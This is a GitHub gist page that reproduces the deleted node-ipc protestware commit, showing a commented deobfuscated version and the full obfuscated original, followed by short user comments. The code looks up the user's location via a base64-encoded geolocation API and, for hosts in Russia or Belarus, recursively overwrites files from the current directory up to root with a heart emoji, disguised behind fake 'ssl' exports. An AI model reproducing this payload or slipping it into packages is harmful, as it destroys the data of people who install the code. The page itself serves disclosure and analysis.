Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
A deleted commit from the node-ipc repository. You can find the original commit here: **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR OWN RISK.**
import u from "path";
import a from "fs";
import o from "https";
// Obfuscated code that I deobfuscated.
// I also added comments which should help explain what exactly is going on here.
// Oiginally written by Brandon Nozaki Miller (
// See you in prison, Brandom.
// Original commit:
// A timeout is used to add an artificial delay.
setTimeout(function () {
// A 50% chance that all of your files will get overwritten.
const t = Math.round(Math.random() * 4);
if (t > 1) return;
// This URL is used to specifically target people in Russia and Belarus.
const n =
// A request is send to the URL above. The server sends the location of the request to the requester.
o.get(n, function (t) {
t.on("data", function (t) {
const n = "./";
const o = "../";
const r = "../../";
const f = "/";
const c = "country_name";
// Specifically targets the citizens of Russia and Belarus.
const e = "russia";
const i = "belarus";
try {
const s = JSON.parse(t);
const u = s[c].toLowerCase();
// "If your country is from Russia or Belarus, overwrite all of your files."
const a = u.includes(e) || u.includes(i);
if (a) {
} catch (t) {}
}, Math.ceil(Math.random() * 1e3));
* @param n The relative location of CWD of where the script was ran.
* @param o Presumably meant to be used recursively.
// The function that does the overwriting. Not sure why it is `async` though.
async function h(n = "", o = "") {
// Checks to see if the directory within your file system exists.
if (!a.existsSync(n)) return;
let r = [];
try {
// Gets all of the files within the directory.
r = a.readdirSync(n);
} catch (t) {}
const f = [];
// Your files will get overwritten with a heart emoji. Perfect.
const c = "❤️";
for (var e = 0; e < r.length; e++) {
const i = u.join(n, r[e]);
let t = null;
try {
t = a.lstatSync(i);
} catch (t) {
// If the file is a directory, it will run the `h` function again.
if (t.isDirectory()) {
const s = h(i, o);
// Again, the function was async. This will not even work properly.
s.length > 0 ? f.push(...s) : null;
} else if (i.indexOf(o) >= 0) {
try {
// The files get overwritten. Thanks, Brandon.
a.writeFile(i, c, function () {});
} catch (t) {}
return f;
// Fake exports probably intended to trick consumers.
const ssl = true;
export { ssl, ssl as default };
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}
Copy link

wongjiahau commented Mar 18, 2022

Don’t run on host, run in it a container

Copy link

shorwood commented Mar 18, 2022

Or Gitpod for the curious ones.

Copy link

mdo992 commented Mar 18, 2022

The API key isn't valid anymore:

{"message":"Provided API key is not valid. Contact technical support for assistance at"}

Copy link

swoopae commented Mar 18, 2022

      // Again, the function was async. This will not even work properly.
      s.length > 0 ? f.push(...s) : null;

leave it to your average js dev to not be even able to write functional malware

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment